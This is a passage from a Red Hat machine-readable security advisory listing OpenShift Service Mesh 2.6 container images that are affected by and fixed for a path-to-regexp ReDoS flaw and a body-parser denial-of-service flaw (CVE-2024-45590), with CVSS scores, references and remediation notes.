"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "path-to-regexp: Backtracking regular expressions cause ReDoS"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
